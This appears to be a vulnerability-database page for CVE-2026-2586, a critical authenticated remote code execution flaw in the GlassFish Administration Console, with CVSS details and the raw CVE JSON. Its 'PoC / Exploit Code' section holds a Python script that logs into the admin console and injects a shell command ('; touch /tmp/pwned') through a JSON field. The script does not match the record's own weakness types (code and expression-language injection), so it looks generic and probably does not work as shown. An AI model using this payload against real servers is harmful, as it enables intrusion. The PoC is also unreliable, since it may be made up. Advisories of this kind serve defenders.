Security Vulnerability Report
CVE-2026-2586 CVSS 9.1 CRITICAL

CVE-2026-2586

Published: 2026-05-19 15:16:28
Last Modified: 2026-05-19 17:57:25

Description

An authenticated Remote Code Execution (RCE) vulnerability was identified in GlassFish's Administration Console. A user with access to the panel can send crafted requests that allow the execution of arbitrary operating system commands with the privileges of the application service user.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

GlassFish Server (Open Source Edition)
GlassFish Server (Commercial Edition)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "http://target-glassfish:4848/management/domain"
username = "admin"
password = "password"

# Malicious payload to execute OS command (e.g., creating a file)
payload = "; touch /tmp/pwned"

# Authenticate and exploit
session = requests.Session()
login_payload = {"j_username": username, "j_password": password, "loginForm": "Login"}
session.post(f"{target_url}/login", data=login_payload)

# Send crafted request to trigger RCE
exploit_headers = {"Content-Type": "application/json"}
exploit_data = {"name": payload}
response = session.post(target_url, json=exploit_data, headers=exploit_headers)

if response.status_code == 200:
    print("[+] Payload sent successfully.")
else:
    print("[-] Failed to send payload.")

References

https://gitlab.eclipse.org/security/cve-assignment/-/issues/87
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-2586",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-19T15:16:28.413",
    "lastModified": "2026-05-19T17:57:25.143",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An authenticated Remote Code Execution (RCE) vulnerability was identified in GlassFish's Administration Console. A user with access to the panel can send crafted requests that allow the execution of arbitrary operating system commands with the privileges of the application service user."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-94"},
          {"lang": "en", "value": "CWE-917"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/87",
        "source": "[email protected]"
      }
    ]
  }
}